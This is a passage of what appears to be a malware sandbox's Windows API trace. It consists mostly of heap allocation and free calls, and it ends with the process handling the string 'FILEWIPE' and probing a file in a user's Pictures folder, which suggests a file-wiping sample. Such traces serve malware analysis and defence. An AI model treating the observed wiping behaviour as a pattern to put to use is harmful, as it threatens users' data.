hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0191.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0191.643] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0191.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0191.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0191.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0191.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0191.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0191.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a90 [0191.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0191.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3d8 [0191.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0191.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda20 [0191.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd408 [0191.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0191.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0191.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.644] CloseHandle (hObject=0x160) returned 1 [0191.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0191.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0191.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0191.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0191.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0191.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0191.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0191.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0191.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0191.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0191.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0191.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0191.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0191.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0191.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0191.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0191.645] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0191.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0191.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0191.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0191.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0191.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0191.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd408 [0191.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda20 [0191.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3d8 [0191.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0191.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0191.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a90 [0191.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0191.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0191.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0191.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0191.645] CloseHandle (hObject=0x158) returned 1 [0191.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0191.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0191.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0191.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0191.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0191.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0191.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0191.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0191.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0191.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0191.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0191.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0191.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0191.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0191.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0191.649] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0191.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0191.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0191.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0191.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0191.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0191.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0191.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0191.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0191.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0191.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0191.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0191.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0191.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0191.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0191.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0191.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0191.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0191.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0191.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0191.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0191.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0191.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0191.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0191.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0191.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0191.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0191.653] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0191.653] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0191.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0191.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0191.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1aa0 [0191.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0191.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0191.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0191.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0191.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd390 [0191.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0191.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0191.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0191.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0191.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0191.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0191.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0191.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0191.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0191.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0191.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0191.654] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0191.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0191.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0191.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0191.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0191.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0191.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.654] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdzhtnrtuaafiidk.bmp")) returned 0x20 [0191.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0191.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0191.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0191.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.655] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0191.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0191.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0191.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0191.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0191.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.655] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cfdcdb0, ftCreationTime.dwHighDateTime=0x1d5e4d7, ftLastAccessTime.dwLowDateTime=0xf6dd40e0, ftLastAccessTime.dwHighDateTime=0x1d5e2b9, ftLastWriteTime.dwLowDateTime=0xf6dd40e0, ftLastWriteTime.dwHighDateTime=0x1d5e2b9, nFileSizeHigh=0x0, nFileSizeLow=0xc3db, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="qdzhTNRtUaAFIidK.bmp", cAlternateFileName="QDZHTN~1.BMP")) returned 0x90af58 [0191.655] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0191.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0191.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0191.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0191.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0191.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0191.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0191.656] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 